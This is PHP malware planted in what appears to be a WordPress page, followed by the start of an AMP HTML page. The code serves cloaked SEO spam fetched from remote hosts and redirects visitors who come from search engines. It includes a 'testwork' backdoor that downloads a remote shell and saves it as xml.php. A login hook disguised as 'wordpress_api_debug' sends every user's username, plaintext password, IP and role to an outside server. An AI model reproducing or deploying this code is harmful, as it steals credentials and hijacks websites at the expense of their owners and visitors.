if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html lang="en-US" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate=""> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,maximum-scale=1.0,user-scalable=no"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012303151529000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;-ms-text-size-adjust:100%;text-size-adjust:100%}html.i-amphtml-singledoc.i-amphtml-embedded{-ms-touch-action:pan-y pinch-zoom;touch-action:pan-y pinch-zoom}html.i-amphtml-fie>body,html.i-amphtml-singledoc>body{overflow:visible!important}html.i-amphtml-fie:not(.i-amphtml-inabox)>body,html.i-amphtml-singledoc:not(.i-amphtml-inabox)>body{position:relative!important}html.i-amphtml-ios-embed-legacy>body{overflow-x:hidden!important;overflow-y:auto!important;position:absolute!important}html.i-amphtml-ios-embed{overflow-y:auto!important;position:static}#i-amphtml-wrapper{overflow-x:hidden!important;overflow-y:auto!important;position:absolute!important;top:0!important;left:0!important;right:0!important;bottom:0!important;margin:0!important;display:block!important}html.i-amphtml-ios-embed.i-amphtml-ios-overscroll,html.i-amphtml-ios-embed.i-amphtml-ios-overscroll>#i-amphtml-wrapper{-webkit-overflow-scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflow-x:hidden!important;overflow-y:hidden!important}amp-instagram{padding:54px 0px 0px!important;background-color:#fff}amp-iframe iframe{box-sizing:border-box!important}[amp-access][amp-access-hide]{display:none}[subscriptions-dialog],body:not(.i-amphtml-subs-ready) [subscriptions-action],body:not(.i-amphtml-subs-ready) [subscriptions-section]{display:none!important}amp-experiment,amp-live-list>[update]{display:none}amp-list[resizable-children]>.i-amphtml-loading-container.amp-hidden{display:none!important}amp-list [fetch-error],amp-list[load-more] [load-more-button],amp-list[load-more] [load-more-end],amp-list[load-more] [load-more-failed],amp-list[load-more] [load-more-loading]{display:none}amp-list[diffable] div[role=list]{display:block}amp-story-page,amp-story[standalone]{min-height:1px!important;display:block!important;height:100%!important;margin:0!important;padding:0!important;overflow:hidden!important;width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplete>textarea{padding:0.5rem;border:1px solid rgba(0,0,0,0.33)}.i-amphtml-autocomplete-results,amp-autocomplete>input,amp-autocomplete>textarea{font-size:1rem;line-height:1.5rem}[amp-fx^=fly-in]{visibility:hidden}amp-script[nodom],amp-script[sandboxed]{position:fixed!important;top:0!important;width:1px!important;height:1px!important;overflow:hidden!important;visibility:hidden} /*# sourceURL=/css/ampdoc.css*/[hidden]{display:none!important}.i-amphtml-element{display:inline-block}.i-amphtml-blurry-placeholder{transition:opacity 0.3s cubic-bezier(0.0,0.0,0.2,1)!important;pointer-events:none}[layout=nodisplay]:not(.i-amphtml-element){display:none!important}.i-amphtml-layout-fixed,[layout=fixed][width][height]:not(.i-amphtml-layout-fixed){display:inline-block;position:relative}.i-amphtml-layout-responsive,[layout=responsive][width][height]:not(.i-amphtml-layout-responsive),[width][height][heights]:not([layout]):not(.i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-amphtml-layout-fixed-height,[layout=container],[layout=fixed-height][height]:not(.i-amphtml-layout-fixed-height){display:block;position:relative}.i-amphtml-layout-fill,.i-amphtml-layout-fill.i-amphtml-notbuilt,[layout=fill]:not(.i-amphtml-layout-fill),body noscript>*{display:block;overflow:hidden!important;position:absolute;top:0;left:0;bottom:0;right:0}body noscript>*{position:absolute!important;width:100%;height:100%;z-index:2}body noscript{display:inline!important}.i-amphtml-layout-flex-item,[layout=flex-item]:not(.i-amphtml-layout-flex-item){display:block;position:relative;-ms-flex:1 1 auto;flex:1 1 auto}.i-amphtml-layout-fluid{position:relative}.i-amphtml-layout-size-defined{overflow:hidden!important}.i-amphtml-layout-awaiting-size{position:absolute!important;top:auto!important;bottom:auto!important}i-amphtml-sizer{display:block!important}@supports (aspect-ratio:1/1){i-amphtml-sizer.i-amphtml-disable-ar{display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important;left:0px!important;width:4px!important;height:4px!important;opacity:0!important;overflow:hidden!important;margin:0!important;display:block!important;visibility:visible!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:8px!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:12px!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:16px!important}.i-amphtml-unresolved{position:relative;overflow:hidden!important}.i-amphtml-select-disabled{-webkit-user-select:none!important;-ms-user-select:none!important;user-select:none!important}.i-amphtml-notbuilt,[layout]:not(.i-amphtml-element),[width][height][heights]:not([layout]):not(.i-amphtml-element),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-element){position:relative;overflow:hidden!important;color:transparent!important}.i-amphtml-notbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][height][heights]:not([layout]):not(.i-amphtml-element),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-element){color:transparent!important;line-height:0!important}.i-amphtml-ghost{visibility:hidden!important}.i-amphtml-element>[placeholder],[layout]:not(.i-amphtml-element)>[placeholder],[width][height][heights]:not([layout]):not(.i-amphtml-element)>[placeholder],[width][height][sizes]:not([layout]):not(.i-amphtml-element)>[placeholder]{display:block;line-height:normal}.i-amphtml-element>[placeholder].amp-hidden,.i-amphtml-element>[placeholder].hidden{visibility:hidden}.i-amphtml-element:not(.amp-notsupported)>[fallback],.i-amphtml-layout-container>[placeholder].amp-hidden,.i-amphtml-layout-container>[placeholder].hidden{display:none}.i-amphtml-layout-size-defined>[fallback],.i-amphtml-layout-size-defined>[placeholder]{position:absolute!important;top:0!important;left:0!important;right:0!important;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0;left:0;right:0;bottom:0;display:block}i-amp-scroll-container.amp-active,i-amphtml-scroll-container.amp-active{overflow:auto;-webkit-overflow-scrolling:touch}.i-amphtml-loading-container{display:block!important;pointer-events:none;z-index:1}.i-amphtml-notbuilt>.i-amphtml-loading-container{display:block!important}.i-amphtml-loading-container.amp-hidden{visibility:hidden}.i-amphtml-element>[overflow]{cursor:pointer;position:relative;z-index:2;visibility:hidden;display:initial;line-height:normal}.i-amphtml-layout-size-defined>[overflow]{position:absolute}.i-amphtml-element>[overflow].amp-visible{visibility:visible}template{display:none!important}.amp-border-box,.amp-border-box *,.amp-border-box :after,.amp-border-box :before{box-sizing:border-box}amp-pixel{display:none!important}amp-analytics,amp-auto-ads,amp-story-auto-ads{position:fixed!important;top:0!important;width:1px!important;height:1px!important;overflow:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid 